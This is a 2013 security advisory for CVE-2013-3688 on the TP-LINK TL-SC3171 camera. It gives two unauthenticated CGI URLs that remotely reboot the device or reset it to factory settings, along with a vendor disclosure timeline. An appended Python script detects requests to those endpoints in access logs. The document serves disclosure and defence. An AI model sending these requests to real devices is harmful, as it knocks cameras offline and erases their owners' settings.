
TP-LINK TL-SC3171 Authentication Bypass

13 Jun 2013 00:00:00 | Reported by Javier Repiso Sanchez | Type: packetstorm | Source: packetstormsecurity.com

TP-LINK TL-SC3171 Authentication Bypass CVE-2013-368

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | TP-LINK TL-SC3171 Authentication Bypass Vulnerability | 14 Jun 2013 00:00 | zdt |
| CVE | CVE-2013-3688 | 1 Oct 2013 19:00 | cve |
| Cvelist | CVE-2013-3688 | 1 Oct 2013 19:00 | cvelist |
| EUVD | EUVD-2013-3621 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2013-3688 | 1 Oct 2013 19:55 | nvd |
| Prion | Design/Logic Flaw | 1 Oct 2013 19:55 | prion |
| RedhatCVE | CVE-2013-3688 | 22 May 2025 11:31 | redhatcve |
`===========================================================================  
TP-LINK  
====================================================================  
===========================================================================  
  
1.Advisory Information  
Title: TP-LINK TL-SC3171 Vulnerability  
Date Published: 12/06/2013  
Date of last updated: 12/06/2013  
  
2.Vulnerability Description  
The following vulnerability has been found in this device:  
-CVE-2013-3688. Authentication Bypass Issues (CWE-592) and Execution with Unnecessary Privileges (CWE-250).  
  
3.Affected Products  
-CVE-2013-3688. The following product is affected: TP-LINK TL-SC3171  
Other models may be affected, but they were not checked.  
  
4.PoC  
4.1.Execute Remote Command bypassing authentication  
CVE-2013-3688, Execute Remote Command bypassing authentication.  
We have found that it is possible to reboot this kind of device remotely. The attack vector is the following:  
_____________________________________________________________________________  
http://xx.xx.xx.xx/cgi-bin/reboot  
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault  
_____________________________________________________________________________  
  
With the first one you get a blank page and cannot log in again until the device has rebooted.  
With the second one you get a victory message and, of course, at the next login you must use the factory settings.  
  
5.Credits  
-CVE-2013-3688 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.  
  
6.Report Timeline  
-2013-05-31: The student team notifies TP-Link Customer Support of the vulnerability. No reply received.  
-2013-06-03: The students ask for a reply.  
-2013-06-04: TP-Link answers, saying Coresecurity reported this vulnerability before and that it has been corrected in a new beta firmware version.  
-2013-06-04: The students answer the vendor, saying that this vulnerability is different from the Coresecurity vulnerabilities.  
-2013-06-05: TP-Link answers, saying this vulnerability is the same as the vulnerability reported by Coresecurity.  
-2013-06-05: The students respond by explaining the details of the vulnerability and confirming that the vulnerability is different.  
-2013-06-06: TP-Link answers, confirming that the vulnerability is fixed with the latest patch for the vulnerabilities reported by Coresecurity. The beta version is available on the TP-Link website.  
`
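
One way to spot requests for the two endpoints named in the advisory in web access logs, as an added example that is not part of the original advisory. It assumes a combined-log-style access log from a proxy in front of the camera; the function names, the log format and the sample lines are constructed for illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Endpoints the advisory lists as reachable without authentication.
SENSITIVE_PATHS = {"/cgi-bin/reboot", "/cgi-bin/hardfactorydefault"}

# Assumed log format (combined-log style, as many proxies write it):
# client ident user [time] "METHOD url PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) '
)

def normalize(url):
    """Return (host, path) with encoding, case and slash variants folded."""
    # Origin-form targets ("/cgi-bin/...") get a placeholder host so urlsplit
    # does not mistake a leading "//" for an authority component.
    parts = urlsplit("http://-" + url if url.startswith("/") else url)
    path = re.sub(r"/+", "/", unquote(parts.path)) or "/"
    return parts.hostname, posixpath.normpath(path).lower()

def find_hits(lines):
    """Group requests for the sensitive endpoints by (device, client)."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        host, path = normalize(m["url"])
        if path in SENSITIVE_PATHS:
            # Assumption: the user field is "-" when the request carried no
            # HTTP credentials, so the last tuple element marks anonymous use.
            hits[(host, m["client"])].append(
                (m["ts"], path, m["status"], m["user"] == "-"))
    return dict(hits)

# Constructed sample lines, not taken from a real device or from the advisory.
SAMPLE = [
    '198.51.100.7 - - [13/Jun/2013:10:00:01 +0000] "GET http://192.0.2.10/cgi-bin/reboot HTTP/1.1" 200 0',
    '198.51.100.7 - - [13/Jun/2013:10:03:40 +0000] "GET http://192.0.2.10//CGI-BIN/%68ardfactorydefault?x=1 HTTP/1.1" 200 41',
    '203.0.113.5 - admin [13/Jun/2013:10:05:00 +0000] "GET /cgi-bin/./reboot HTTP/1.1" 200 0',
    '203.0.113.5 - admin [13/Jun/2013:10:06:00 +0000] "GET http://192.0.2.10/index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for (device, client), events in find_hits(SAMPLE).items():
        print(device, client, events)
```

Any hit where the last field is `True` and the status is 200 deserves follow-up, since the advisory reports that these endpoints respond without a login.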
